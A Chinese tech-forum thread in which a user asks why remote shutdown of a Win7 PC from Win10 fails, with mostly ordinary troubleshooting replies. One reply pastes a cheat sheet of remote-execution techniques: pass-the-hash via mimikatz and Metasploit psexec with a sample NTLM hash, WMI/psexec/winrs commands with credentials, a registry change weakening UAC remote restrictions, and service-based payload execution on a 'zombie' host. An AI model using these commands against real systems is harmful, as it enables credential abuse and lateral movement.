无忧启动论坛

 找回密码
 注册
搜索
系统gho:最纯净好用系统下载站Win To Go 极致利器(IXUNCIS固态U盘)广告联系 微信:wuyouceo QQ:184822951
查看: 810|回复: 14

[求助] 网络通畅,win10不能远程关机win7,提示网络地址无效.....

[复制链接]
发表于 2021-11-24 11:03:39 | 显示全部楼层 |阅读模式
网络通畅,win10不能远程关机win7,提示网络地址无效.....



2021-11-24_105851.png


不清楚啥原因......

大师们请解答......



网络通畅,win10不能远程关机win7,提示网络地址无效.....
发表于 2021-11-24 11:09:39 | 显示全部楼层
目标机上设置有问题吧

点评

目标机设置有问题......... 不会提示网络地址无效啊......  详情 回复 发表于 2021-11-24 11:27
回复

使用道具 举报

发表于 2021-11-24 11:20:43 | 显示全部楼层
windows远程执行cmd命令的9种方法
一、远程执行命令方式及对应端口: IPC$+AT 445 PSEXEC 445 WMI 135 Winrm 5985(HTTP)&5986(HTTPS)
二、1.WMI执行命令方式,无回显:wmic /node:192.168.1.158 /user:pt007 /password:admin123  process call create "cmd.exe /c ipconfig>d:\result.txt"
2.使用Hash直接登录Windows(HASH传递)
抓取windows hash值,得到administrator的hash:
598DDCE2660D3193AAD3B435B51404EE:2D20D252A479F485CDF5E171D93985BF

msf调用payload:
use exploit/windows/smb/psexec show optionsset RHOST 192.168.81.129set SMBPass 598DDCE2660D3193AAD3B435B51404EE:2D20D252A479F485CDF5E171D93985BFset SMBUser Administratorshow optionsrun[url=][/url]

3. mimikatz传递hash方式连接+at计划任务执行命令:mimikatz.exe privilege::debug "sekurlsa::pth /domain:. /user:administrator /ntlm:2D20D252A479F485CDF5E171D93985BF" //传递hashdir \\192.168.1.185\c$
4.WMIcmd执行命令,有回显:WMIcmd.exe -h 192.168.1.152 -d hostname -u pt007 -p admin123 -c "ipconfig"
5.Cobalt strkie远程执行命令与hash传递攻击:
6.psexec.exe远程执行命令psexec /accepteula //接受许可协议sc delete psexesvcpsexec \\192.168.1.185 -u pt007 -p admin123 cmd.exe
7.psexec.vbs远程执行命令
cscript psexec.vbs 192.168.1.158 pt007 admin123 "ipconfig"
8.winrm远程执行命令//肉机上面快速启动winrm服务,并绑定到5985端口:
winrm quickconfig -qwinrm set winrm/config/Client @{TrustedHosts="*"}netstat -ano|find "5985"//客户端连接方式:winrs -r:http://192.168.1.152:5985 -u:pt007 -p:admin123 "whoami /all"winrs -r:http://192.168.1.152:5985 -u:pt007 -p:admin123 cmd//UAC问题,修改后,普通管理员登录后也是高权限:reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /fwinrs -r:http://192.168.1.152:5985 -u:pt007 -p:admin123 "whoami /groups"9.远程命令执行sc

//建立ipc连接(参见net use + at)后上传等待运行的bat或exe程序到目标系统上,创建服务(开启服务时会以system 权限在远程系统上执行程序):
[url=]net use \\192.168.17.138\c$ "admin123" /user:pt007[/url]
net usedir \\192.168.17.138\c$copy test.exe \\192.168.17.138\c$sc \\192.168.17.138 create test binpath= "c:\test.exe"sc \\192.168.17.138 start testsc \\192.168.17.138 del test




评分

参与人数 1无忧币 +2 收起 理由
五分钱 + 2 很给力!

查看全部评分

回复

使用道具 举报

 楼主| 发表于 2021-11-24 11:27:55 | 显示全部楼层
ylac 发表于 2021-11-24 11:09
目标机上设置有问题吧

目标机设置有问题.........

不会提示网络地址无效啊......
回复

使用道具 举报

发表于 2021-11-24 11:30:40 来自手机 | 显示全部楼层
经常失效,远程命令失败,只能物理操作。
回复

使用道具 举报

发表于 2021-11-24 11:45:23 | 显示全部楼层
以管理员身份运行cmd 试试

点评

用的就是管理员模式啊.....  详情 回复 发表于 2021-11-24 12:21
回复

使用道具 举报

 楼主| 发表于 2021-11-24 12:21:51 | 显示全部楼层
yfwang0798 发表于 2021-11-24 11:45
以管理员身份运行cmd 试试



用的就是管理员模式啊.....
回复

使用道具 举报

发表于 2021-11-24 12:26:50 来自手机 | 显示全部楼层
安全策略
回复

使用道具 举报

发表于 2021-11-24 15:07:42 | 显示全部楼层
针对远程 win7,可以用 微软工具  Sysinternals
其中 的  命令  
psexec.exe \\机器名 -u administrator -p  密码  cmd /c shutdown

这种方式 对 远程 win10无效
回复

使用道具 举报

发表于 2021-11-24 15:31:11 | 显示全部楼层
如果能远程桌面,可以上去 -shutdown

你这种关法,可能目标未被控
回复

使用道具 举报

发表于 2021-11-25 11:57:38 | 显示全部楼层
ping得通只代表网络是通的,让远方的机器听你指挥做动作首先必须登录成功,依据你登录时的身份不同,权限也不同,不登录你没法做任何操作。
回复

使用道具 举报

发表于 2021-11-25 15:20:36 | 显示全部楼层
ping一下百度,再远程关百度的IP试下提示什么?

点评

好主意。  发表于 2021-11-25 19:48
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

小黑屋|手机版|Archiver|捐助支持|无忧启动 ( 闽ICP备05002490号-1 )

闽公网安备 35020302032614号

GMT+8, 2023-2-9 07:44

Powered by Discuz! X3.3

© 2001-2017 Comsenz Inc.

快速回复 返回顶部 返回列表